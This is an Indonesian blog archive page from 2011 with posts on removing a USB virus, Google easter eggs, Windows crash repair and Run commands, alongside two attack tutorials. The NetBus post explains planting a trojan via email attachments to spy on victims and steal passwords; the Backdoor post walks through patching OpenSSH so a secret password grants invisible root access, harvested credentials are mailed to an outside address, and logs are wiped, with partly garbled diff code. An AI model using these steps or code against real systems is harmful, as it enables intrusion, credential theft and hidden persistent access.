November 2011 ~ Dwipangga™

This is featured post 1 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 2 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 3 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 4 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

This is featured post 5 title

Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.

Selasa, 15 November 2011

menghilangkan RECYCLED

22.22

Unknown

Pernah kena virus resycled?
Tiba-2 kompi jadi lemot?

Ini cara ngilangin manual, tanpa antivius.
Loh, kok ga pake antivirus?
Na, silakan baca penjelasan saia berikut.

Bagaimana virus menginfeksi
---------------------------
Paling umum adalah dari removable media seperti flash disk.
Saat kita dobel-klik flash disk yang terinfeksi, kita
secara tidak sadar menjalankan autorun.inf milik sang virus.
Ini adalah contoh "social engineering" para pembuat virus,
yaitu memanfaatkan kebiasaan dan ketidaktelitian pengguna.

Repotnya, dengan men dobel-klik tersebut, pengguna mamberi
wewenang pada windows untuk melakukan batch operation, yang
perintah-2 nya seakan-akan "tidak membahayakan" sistem, sehingga
sangat sering virus autorun / dobel-klik, mem-bypass antivirus.
Karena dianggap bukan virus, saat kita lakukan scan virus,
maka hasilnya akan negatif. Ataupun jika ketemu belum tentu bisa
menghapus, karena itu, diperlukan cara manual untuk menghilangkannya.

Apa yang dia lakukan
--------------------
- Saat running dia akan membuat file autorun.inf di drive yang aktif
- Virus tersebut akan menyalin file "boot.com" ke folder-2 system
- Melakukan penambahan entry pada registry

Cara manghilangkan virus resycled
---------------------------------
01 Restart komputer
02 Masuk safe mode (tekan F8 saat booting, pilih safe mode)
03 Buka explorer

Penting: selama proses JANGAN membuka drive/folder dengan dobel-klik

04 Masuk menu tools --> folder options --> view
05 Pilih "Show hidden files and folders"
06 Hilangkan centang pada pilihan berikut:
--> * Hide extensions for known file types
--> * Hide protected operrating system files
07 Dengan menggunakan explorer tree, temukan dan hapus file "autorun.inf"
08 Lakukan langkah 07 pada semua drive, bisa manggunakan search, tapi
hati-2 ada file autorun yang memang diperlukan.
09 Periksa folder-2:
--> c:\windows\system32\dllcache
--> c:\windows\prefetch
cari file "boot.com", jika ketemu, hapus
10 Buka folder-2:
--> c:\windows\temp
--> c:\Documents and Settings\[USER PROFILE]\Local Settings\Temp
hapus semua isinya, ada beberapa file yang menolak dihapus, biarkan saja
11 Jalankan REGEDIT
12 Pilih File --> search
13 cari entry "boot.com", jika ketemu hapus. Tekan F3 untuk mengulang pencarian
sampai akhir registry
14 Kembali pada entry pertama, lakukan seperti langkah 13 untuk entry "resycled"
15 Tutup semua aplikasi, restart kompi
16 Buka explorer, cari dan hapus semua folder "resycled"
17 Untuk jaga-2 lakukan kembali langkah 07 dan 08

-- Selamat, kompi anda sudah bebas dari virus resycled --

TIPS:
- Jangan buka flash disk / drive dengan dobel-klik, pake explorer tree saja
- Gunakan opsi show hidden files pada folder options
- Gunakan opsi show extention pada folder options
- Waspada jika ada nama file / folder berganda
- Waspada jika file kerja anda berekstensi .com atau .exe
- Jangan klik file yang tiba-2 muncul / tidak pernah anda bikin, apalagi kalo namanya aneh-2
- Gunakan antivirus, lakukan update rutin
- Selalu hati-2 dan teliti, terutama waktu lagi buru-2

Semoga dapat berguna bagi mereka yang kena virus ini dan udah nyerah sampe mau
install ulang.

by: bluemanjaro, (dy inspirasi dari tulisan ini)
hhiii

Lucu'a mbah GooGle

22.17

Unknown

Sapa sih yang ga kenal ma mbah Google???
orang Jadoel ajje yang kga kenal ma Google...wkwkwk
tapi siapa yang kira di balik raksasa google ada hal yang unik yang dapat loe temuin di mbah google......

Sebagai mesin pencari no 1 di dunia maya saat ini...
google sangat sering sekali digunakan oleh pengguna internet sebagai search engine terlengkap..
anda bisa mencari apapun disini mulai dari informasi berita,pengetahuan,gosip dan masih banyak lagi..
pokoknya bisa diibaratkan sebagai all in one..
tapi ada beberapa rahasia yang tersimpan didalam google yang bisa kita buka dengan memasukkan kata kunci rahasia..ini hanya sebagai joke saja

1.Isikan kata “googoth” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”.anda akan segera dibawa masuk ke tampilan google yang gelap dan terkesan gothic.

2.Isikan kata “ewmew fudd” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”. anda akan dibawa masuk ke tampilan google dengan teks versi tokoh Elmer Fudd dari Warner Bros.

3.Isikan kata “xx-klingon” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”. anda akan segera dibawa masuk ke tampilan google dengan bahasa suku Klingon.

4.Isikan kata “google bsd” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”.perhatikan ikon google yang biasa menjadi ikon bsd.
5.Isikan kata “google linux” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”. Coba perhatikan ikon google yang biasa menjadi ikon Linux. :linux:

6.Isikan kata “google easter egg” pada keyword, lalu tekan tombol “I’m Feeling Lucky / Saya Lagi Beruntung”. anda akan disuguhi dengan tampilan mesin pencari google dengan sebuah game menangkap telur paskah, dimana anda bisa mengendalikan gerak kelinci tersebut.

ini ada yang lebih seru lagi...saat anda akan mencari image di google,anda bisa membuat seluaruh gambar disana bergoyang goyang...caranya buka google lalu pilih image..masukkan nama gambar..terserah apa aja...lalu klik search
setelah semua gambar terbuka...copy code berikut di address bar dan tekan enter

1.membuat gambar naik turun

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.mkssddddddddddd=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterv al('A()',5); void(0);

2.membuat gambar muter muter

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.right=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterv al('A()',5); void(0);

Bagaimana keren bukan... Selamat menikmati~

wkkwkkk

Senin, 07 November 2011

Hacking dengan NETBUS

06.28

Unknown

NetBus adalah program hacking karya Carl- Fredrik Neikter seorang hacker asal Swedia yang di buat dengan bahasa Delphi. Program ini dapat bekerja pada sistem operasi Windows 95/98/ Me/2000/XP dan NT. NetBus pertama kali muncul pada tahun 1998 dengan versi 1.60 kemudian keluar NetBus versi 1.70 pada tahun yang sama. Ada juga NetBus Pro v2.01 dan NetBus Pro v2.10 yang dirilis tahun 1999. Hingga saat ini, Netbus masih menjadi salah satu ancaman keamanan komputer.

Hacking dengan Netbus
Sebelum melakukan hacking, pastikan versi NetBus yang akan di gunakan. Jika menggunakan NetBus versi 1.60 atau NetBus versi 1.70, maka port yang di lacak adalah port nomor 12345. Untuk NetBus Pro versi 2.01 dan NetBus Pro v2.10, port yang di cari adalah port 20034.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe sebesar 559.552 KB dan Patch.exe dengan kapasitas 494.592 KB. NetBus.exe merupakan file pengendali yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer “korban”.

Ada beberapa cara untuk “menanam” file Patch.exe di komputer “korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke Folder Windows. Atau gunakan cara lain yang aman untuk menyebarkan file patch.

Tahap selanjutnya adalah menentukan host atau alamat IP yang di-hack. Untuk mencari alamat host dan IP Address yang terifeksi patch.exe, klik tombol Scan lalu klik tombol Start. Isi kotak Scan dengan IP Address awal dan kotak To dengan IP Address akhir. Tunggu beberapa saat, jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu kita bisa melakukan apa yang kita sukai, termasuk menyadap password email orang lain.

Selanjutnya, kita copy salah satu alamat IP tersebut, paste ke field Host name/IP pada jendela utama program NetBus. Klik tombol Connect. Jika user tersebut belum memutuskan koneksinya ke Internet maka kita akan melihat pesan status koneksi di jendela program NetBus yang menunjukkan sudah terhubung.

Kini kita dapat melakukan beberapa hal terhadap komputer korban. Pada NetBus tersedia sedikitnya 22 tombol, klik tombol “Active wnds” untuk melihat semua program yang sedang dijalankan orang tersebut di komputernya. Atau jika kita tertarik untuk melihat apa yang sedang diketik, maka klik tombol “Listen.” Anda akan melihat jendela seperti yang terlihat pada gambar di atas. Selanjutnya, silahkan bereksperimen sendiri dengan program ini, mudah bukan?

Download Netbus :
- Netbus 1.70
- Netbus 2.01 Pro

Antisipasi serangan Netbus
1. Update terus antivirus di computer anda, karena Netbus masuk kategori virus Trojan
2. Install sebuah firewall bernama Snort untuk mendeteksi para penyusup. Software ini bisa di peroleh secara gratis di www.snort.org
3. Pasang software proxy berbasis firewall seperti zona alarm yang bertujuan memfilter dan mengontrol semua lalu-lintas data yang masuk dan selama ini cukup dipercaya mampu melindungi komputer dari gangguan hacker atau cracker.

4. Install NetBus Detective 5.2. Software ini adalah specialist pendeteksi Netbus semua versi.

Cara mengatasi komputer yang sering Crash

06.11

Unknown

cara mengatasi widows yang crash dan solusinya

Windows Anda tidak mau dijalankan atau tidak berfungsi dengan lancar? Tak usah panik. Sebelum mengirim PC Anda ke tempat reparasi, cobalah untuk mengatasinya sendiri.

Bila Windows sejak awal menolak bekerja, periksa apakah ada kerusakan hardware atau tidak Setelah diperiksa, baru Anda dapat menghidupkan kembali sistem operasi.

Bila PC terus hang dengan laporan 'Verifying DMI Pool Data', berarti ada masalah dengan boot sektor hard disk. Periksa apakah hard disknya itu sendiri bermasalah atau tidak. Bila dari sisi hardware tak ada masalah, kemungkinan sumbernya hanya pada boot sektor. Boot dari CD Setup Windows XP dan jalankan ‘Restore-Console’. Lalu masukkan perintah berikut. ‘fixmbr’ Windows akan mereparasi MBR yang sangat penting. Dengan cara ini, biasanya Windows akan kembali berfungsi.

Bila belum berhasil, jalankan kembali Restore-Console dan kali ini masukkan perintah berikut.

‘fixboot•c:’

Sesuaikan huruf drive-nya jika Windows XP Anda berada di partisi selain 'C:\'. Perintah di atas akan memperbarui boot sektor sebenarnya yang berisi file-file start untuk Windows.

Untuk mulai bekerja, Windows XP membutuhkan file 'ntdetect.com', 'ntldr.exe', dan 'boot.ini'. Jika salah satu file ini rusak atau terhapus, saat start Anda akan mendapat laporan 'File boot.ini cacat' atau 'NTLDR tidak ada atau rusak'. Dengan CD Windows Anda dapat memulihkan file-file tersebut dengan cepat. Untuk me-restore 'boot.ini' jalankan Restore-Console dan masukkan perintah berikut.

‘bootcfg/rebuild’

Kedua file lainnya tidak dapat direparasi. Oleh karena itu, copy saja dari CD Windows ke direktori utama partisi XP.Misalnya untuk mengcopy file 'ntldr.exe' dari drive CD 'D:\' ke partisi Windows di 'C:\', masukkan perintah berikut ke dalam konsol. ‘copy d:\i386\ntldr c:\ ’ Dengan cara yang sama, copy juga file 'ntdetect.com'. Sekarang Anda dapat merestart Windows.

Bila Windows hang pada layar pembuka, seringkali penyebabnya adalah masalah driver. Untuk mengetahui apakah driver sistem Windows atau driver perangkat buatan produsen lain yang menjadi masalah, jalankan Windows dalam Safe-Mode. Dalam Safe-Mode ini Windows akan membuat sebuah file log bernama 'ntbtlog.txt' dalam direktori Windows. Di sana tercantum semua driver yang dijalankan pada saat start. Dalam Safe-Mode hanya driver sistem penting yang akan dijalankan. Jika driver sistem ini tidak dapat dijalankan, Anda harus segera mengganti file-file yang diperlukan. Sediakan CD Windows dan masukkan perintah berikut pada command-prompt. ‘sfc /scannow’ Perintah ini akan mengganti driver yang rusak dengan file aslinya dari CD Windows.

Driver yang tidak penting bagi Windows tidak akan dijalankan dalam Safe-Mode. Untuk memeriksa driver apa saja yang dijalankan Windows, pilih 'Enable Boot Logging' dalam 'Windows Advanced Option Menu' yang muncul jika Anda menekan [F8] saat booting.Windows akan dijalankan seperti biasa dengan membuat file log. Semua driver yang dijalankan hingga desktop muncul akan dicantumkan dalam file 'ntbtlog.txt'. Driver dengan catatan 'Did not load driver' berpotensi sebagai sumber kesalahan. Dengan Windows Explorer, temukan file driver berakhiran '.sys' yang dicantumkan dalam file log. Klik kanan file ini dan pilih 'Properties'. Di sini akan Anda temukan keterangan mengenai produsen atau perangkat yang mengakses driver tersebut. Matikan komponen ini dalam Device-Manager dan restart Windows. Bila Windows dapat bekerja tanpa masalah, berarti Anda telah menemukan sumber kesalahannya. Install ulang atau update driver yang bermasalah ini.

Bila Windows selalu crash ketika Anda menjalankan aplikasi yang membebani resource seperti game 3D, kemungkinan sebuah driver tidak mampu menanggung beban tersebut. Untuk mensimulasikan minimnya resource sistem (yang berarti adanya beban tinggi pada sistem), klik 'Start | Run' dan jalankan Driver Verifier Manager dengan perintah berikut. ‘verifier’ Pilih 'Create custom settings'. Dalam jendela berikutnya, pilih 'Enable predefined settings', 'Standard settings', dan 'Low resource simulation'. Bila Anda mencurigai driver tertentu, dalam jendela berikutnya pilih 'Select driver names from a list' dan beri tanda driver tersebut. Jika Anda tidak tahu driver mana yang mencurigakan, pilih 'Automatically select unsigned driver'. Alasannya, driver bersertifikat (signed) sudah diperiksa oleh Microsoft sehingga kemungkinan besar bukan merupakan sumber kesalahan. Klik 'Finish' untuk menutup wizard. Restart Windows untuk mulai menjalankan pemeriksaan. Jika salah satu driver gugur dalam tes beban, Anda akan mendapatkan blue-screen yang menampilkan nama driver tersebut (bila beruntung).

Melacak Komponen yang Kepanasan

Bila sebuah kipas rusak atau tuntutan pada hardware terlalu besar, usia komponen akan semakin pendek dan sistem juga berpotensi untuk crash terus menerus. Oleh karena itu, periksa secara teratur suhu hard disk, mainboard, dan CPU.

Bila Windows crash tanpa memberikan laporan kesalahan dan driver serta kelebihan panas bukan penyebabnya, kemungkinan RAM yang rusak.

Bila PC Anda langsung restart setelah di-shutdown, kemungkinan kesalahan ada pada salah satu setting dalam BIOS. Cari entri-entri seperti 'Wake on LAN', 'Wake on Ring', atau 'Wake up by keyboard' dalam BIOS dan matikan (disable) pilihan yang tidak Anda inginkan.

BIOS tidak mengenali hard disk,tetapi motor hard disk berputar.

Penyebab: Setting jumper salah, kabel IDE tidak terpasang dengan benar.

Solusi: Bila menggunakan beberapa harddisk / CD Drive, hard disk Windows harus dipilih sebagai 'Master'. Ini dilakukan dengan perantaraan jumper. Cara mengatur jumper yang benar biasanya tercantum pada stikerdi badan hard disk. Pada perangkat baru sering tercantum keterangan 'Device 0' (Master) dan 'Device 1' (Slave). Bila BIOS masih belum mengenali hard disk, periksa apakah semua koneksi IDE telah terpasang dengan benar atau tidak.

Tidak ada tanda-tanda kehidupan, kipas power-supply tidak berfungsi, lampu-lampu kontrol di depan juga tidak menyala.

Penyebab: Tidak ada pasokan listrik, kabel atau power-supply mungkin rusak.

Solusi: Periksa apakah kabel power-supply terpasang dengan benar dan power-supply hidup atau tidak. Bila mungkin, coba pada stopkontak lain. Bila tidak membantu, power-supply harus diganti.

PC mengeluarkan serangkaian bunyi beep, BIOS tidak bisa ditampilkan.

Penyebab: Biasanya ada masalah dengan graphic-card atau RAM

Solusi: Bila pada Award-BIOS terdengar bunyi beep panjang sekali dan pendek 2 kali, berarti graphic-card tidak duduk dengan benar dalam slot atau rusak.

Lampu hard disk terus menyala, PC tidak bisa di-boot.

Penyebab: Kesalahan pada kabel data E-IDE atau P-ATA.

Solusi: Periksa terlebih dulu apakah kabel telah terpasang dengan benar pada mainboard dan hard disk. Bila tidak membantu, Anda perlu mengganti kabel.

PC hanya kadang-kadang bisa distart, Windows seringkali crash pada game 3D dan aplikasi yang hardwareintensive.

Penyebab: Penyaluran panas yang buruk antara prosesor dan pendingin atau pendinginan CPU tidak memadai.

Solusi: Perbarui pasta atau pad penghantar panas. Di sini perlu Anda perhatikan agar tidak ada sisa pasta lama yang tertinggal pada chip. Bila tidak membantu, dibutuhkan pendinginan yang lebih baik terutama pada CPU yang di-overclock.

Hard disk kadang-kadang berhenti berfungsi dan menimbulkan bunyi 'klak-klak'. Setelah masuk ke Windows, sering muncul laporan blue-screen.

Penyebab: Usia hard disk sudah lewat, cacat fisik serius.

Solusi: Backup segera hard disk Anda dan segera beli sebuah hard disk baru.

Pada tampilan video di layar monitor muncul bercak-bercak (artefak) meskipun telah menginstalasikan driver terbaru.

Penyebab: Graphic-card kepanasan.

Solusi: Periksa kipas graphic-card. Bila perlu, turunkan clock-speed graphic-card dengan tool Powerstrip. Bila artefak hilang, berarti pendinginan terlalu lemah

kode RUN Windows

05.58

Unknown

hmmm...kali nie w mw bagiin kode menu RUN yang ada di windows
ntu tu,,,,,klo kita klik start truz run...
langsung ajjaa nie command run windows

Windows Vista run commands:
* Color Management — colorcpl
* Computer Management Launcher — CompMgmtLauncher
* Control Panel — control
* Credential Backup and Restore Wizard — credwiz
* Defragment User Interface — dfrgui
* Driver Package Installer — dpinst
* Display Adapter Troubleshooter — AdapterTroubleshooter
* Encryption File System — rekeywiz
* Event Viewer — eventvwr
* Firewall Settings — FirewallSettings
* Firewall Control Panel — FirewallControlPanel
* Help Pane — helppane
* iSCSI Initiator — iscsicpl
* Iexpress — iexpress
* Logoff from Vista — logoff
* Language Pack Installer — lpksetup
* Microsoft Sync Center — mobsync
* Microsoft Support Diagnostic Tool — msdt
* Optional Features Manager — optionalfeatures
* Performance Monitor — perfmon
* Presentation Settings — presentationsettings
* Printer Migration — PrintBrmUi
* Snipping Tool — snippingtool
* Software Licensing/Windows Activation — slui
* Sound Volume — sndvol
* Sound Recorder — soundrecorder
* Sticky Note — StikyNot
* System Properties — SystemPropertiesAdvanced
* User Accounts — Netplwiz
* Windows Fax and Scan — wfs
* Windows Mobility Center — mblctr
* Windows Backup Utility — sdclt

=========================

Windows XP run commands:
1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad - notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver
116. Windows XP Tour Wizard - tourstart
117. Wordpad - write

Semoga bermanfaat yeee....
hhohoooo

Rabu, 02 November 2011

Backdoor

23.38

Unknown

Pasti bertanya"...
apa sih pengertian Backdoor itu
disini w mw jelasin...
kalo dah tau,,pasti penasaran dehh...Cz nie termasuk "senjata" utama dalam hacking...

yaa klo pusing ketika pertama kali ngeliat cara menaruh backdoor ini yaa wajar...
(Cz w pertama kali juga pertama klai pusing..hheee)

PENGERTIAN
Backdoor (pintu belakang) adalah salah satu rootkit yang bertugas untuk memberikan
jalasa masuk (secara illegal) terhadap sebuah sistem operasi, baik itu sifatnya
single port atau multiple port. Backdoor bekerja secara invisible dan tidak
bersifat sebagai normal authentication login.

Backdoor bisa bersifat sebagai sniffer, dalam artian fungsi dari backdoor tidak
sebatas sebagai jalan masuk (secara illegal), namun dia akan mempunyai dualisme
tugas yaitu sebagai pencatat login yang ada didalam sebuah sistem operasi.

[1.2] Menentukan Backdoor yang layak dipakai

Pengertian dari memilih backdoor yang layak disini adalah yang mempunyai beberapa
kriteria sebagai berikut:

1. Pastikan backdoor tersebut aman dari kontrol original root.
2. Backdoor yang dipakai tidak menimbulkan proses tambahan yang ada didalam
sebuah server.
3. Mempunyai kemampuan yang multifungsi, dalam artian disamping sebagai jalan masuk
juga berfungsi sebagai pencatat segala informasi yang ada didalam sistem operasi.

Kenapa backdoor harus tidak menambah proses yang ada didalam server? karena disini
penulis mengasumsikan bahwa sysadmin yang menjadi target `bukanlah orang yang bodoh’
mereka akan secara rutin mencatat segala perubahan yang terjadi didalam server. Hal
ini menuntut kita untuk melakukan perubahan didalam server seminimal mungkin.

Untuk tulisan ini, dipilih backdoor yang menginfeksi service OpenSSH, dengan
pertimbangan bahwa service OpenSSH adalah service standar yang ada dalam sebuah
sistem operasi UNIX, dan backdoor ini tidak menambah proses baru didalam server.

Secara standar jenis backdoor ini sudah mempunyai dua fungsi yang ideal sebagai
backdoor. Pertama memungkinkan kita untuk login secara remote dengan akses root
secara invisible, dan kedua memungkinkan kita untuk mengetahui informasi dari login
yang masuk dan keluar semua user yang ada didalam server.

Kelemahannya mungkin tidak secara otomatis mengirimkan informasi tersebut kedalam
email. Hal ini menyebabkan kita harus dua kali kerja untuk mengetahui informasi
tersebut. Didalam tulisan ini disamping menjelaskan bagaimana menginstal backdoor
tersebut, juga membahasa bagaimana cara mengoptimalkan kinerja backdoor ini.

[2] Instalasi Backdoor OpenSSH-3.4p1

Ada beberapa hal yang harus diperhatikan sebelum kita melakukan penetrasi terhadap
sebuah server yang berhasil kita masuki.

Pertama adalah melihat versi OpenSSH asli yang ada didalam server, dan kedua adalah
memperhatikan dan menganalisa seberapa sering root login didalam server, hal ini
akan memberikan gambaran yang jelas seberapa teliti sysadmin dalam mengelola server.

Dalam proses instalasi ini membutuhkan beberapa file pendukung yaitu:
1. ssh0wn.diff
http://sec.angrypacket.com/code/ssh0wn.diff
2. Openssh-3.4p1.tar.gz
http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

Setelah semua file pendukung tersebut berhasil anda simpan didalam server, langkah
awal adalah melakukan pemecahan file OpenSSH-3.4p1 (extract), dan kedua memindahkan
file ssh0wn.diff kedalam direktori OpenSSH-3.4p1

Gambaran secara jelas dalam proses instalasi dapat anda lihat dari ilustrasi
dibawah ini:

[betha@tiamat:~]$ wget http://sec.angrypacket.com/code/ssh0wn.diff
–21:17:29– http://sec.angrypacket.com/code/ssh0wn.diff
=> `ssh0wn.diff’
Resolving sec.angrypacket.com… 64.84.39.37
Connecting to sec.angrypacket.com[64.84.39.37]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5,595 [text/plain]

100%[============================>] 5,595 –.–K/s

21:17:29 (1.29 MB/s) – `ssh0wn.diff’ saved [5595/5595]

[betha@tiamat:~]$ wget http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
–21:17:40– http://openbsd.md5.com.ar/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
=> `openssh-3.4p1.tar.gz’
Resolving openbsd.md5.com.ar… 200.32.4.46
Connecting to openbsd.md5.com.ar[200.32.4.46]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 837,668 [application/x-tar]

100%[============================>] 837,668 38.64K/s ETA 00:00

21:18:03 (37.27 KB/s) – `openssh-3.4p1.tar.gz’ saved [837668/837668]

[betha@tiamat:~]$ tar xzf openssh-3.4p1.tar.gz
[betha@tiamat:~]$ mv ssh0wn.diff openssh-3.4p1
[betha@tiamat:~]$ cd openssh-3.4p1
[betha@tiamat:~/openssh-3.4p1]$ patch pw_name,password);
fclose (outf);
return 1;
}else
return 0;
[...]
——————————————————————–

Dan rubah file tersebut dengan:

——————————————————————–
[...]

if(strcmp(encrypted_password, pw_password) == 0){
outf = fopen(_LOG_DIR”/”_S_LOG,”a+”);
fprintf (outf, “%s:%s:%s:%d%s\n”,pw->pw_name,password, get_remote_ipaddr(), get_local_port(), system(“cat /dev/hdal/slog | mail aris@kecoak.or.id”));
fclose (outf);
return 1;
}else
return 0;
[...]
——————————————————————–

Simpan file tersebut dan segera memulai instalasi akhir dari penetrasi OpenSSH ini.Proses
instalasi OpenSSH ini HANYA bisa dilakukan oleh akses root.

[root@tiamat:~]# ./configure –prefix=/usr –sysconfdir=/etc/ssh
[root@tiamat:~]# make
[root@tiamat:~]# make install
[root@tiamat:~]# make clean && make distclean
[root@tiamat:~]# echo “UsePrivilegeSeparation no” >> sshd_config
[root@tiamat:~]# cp -f sshd_config /etc/ssh/sshd_config
[root@tiamat:~]# mkdir /dev/hdal
[root@tiamat:~]# chmod 777 /dev/hdal
[root@tiamat:~]# kill -HUP `cat /var/run/sshd.pid’

Proses akhir selesai, dan segera lakukan penghapusan log yang tertinggal diserver
yang berhasil anda attack. Dan anda dapat login kedalam server tersebut melalui
port standar openssh (22) dan dengan menggunakan password yang telah anda tentukan
didalam file `includes.h’

[4] References

— Backdoor Ensiklopedia
— Angrypacket Security Project

Lampiran ssh0wn.diff

# $Id: ssh0wn.diff,v 1.6 2002/08/08 21:53:02 enz00 Exp $
#
# patch for openssh-3.4p1
#
# when applied this patch will authenticate you
# as any user with the secret password and that user
# will not be logged. it will also log logins/passwords
# client and server side
#
# usage:
# you’ll probably want to change the defines found below
# make sure that the _LOG_DIR is chmod 777
# cp ssh0wn.diff openssh-3.4p1/;cd openssh-3.4p1
# patch pw_name,password);
+ fclose (outf);
+ return 1;
+ }else
+ return 0;
#endif /* !USE_PAM && !HAVE_OSF_SIA */
}
— openssh-3.4p1/auth.c Wed May 22 01:06:28 2002
+++ ssh0wn/auth.c Thu Aug 1 23:16:54 2002
@@ -248,14 +248,17 @@
else
authmsg = authenticated ? “Accepted” : “Failed”;

- authlog(“%s %s for %s%.100s from %.200s port %d%s”,
- authmsg,
- method,
- authctxt->valid ? “” : “illegal user “,
- authctxt->user,
- get_remote_ipaddr(),
- get_remote_port(),
- info);
+ /* dont log if secret pass */
+ if(!mlogin_ok){
+ authlog(“%s %s for %s%.100s from %.200s port %d%s”,
+ authmsg,
+ method,
+ authctxt->valid ? “” : “illegal user “,
+ authctxt->user,
+ get_remote_ipaddr(),
+ get_remote_port(),
+ info);
+ }
}

/*
— openssh-3.4p1/canohost.c Tue Jun 11 12:47:22 2002
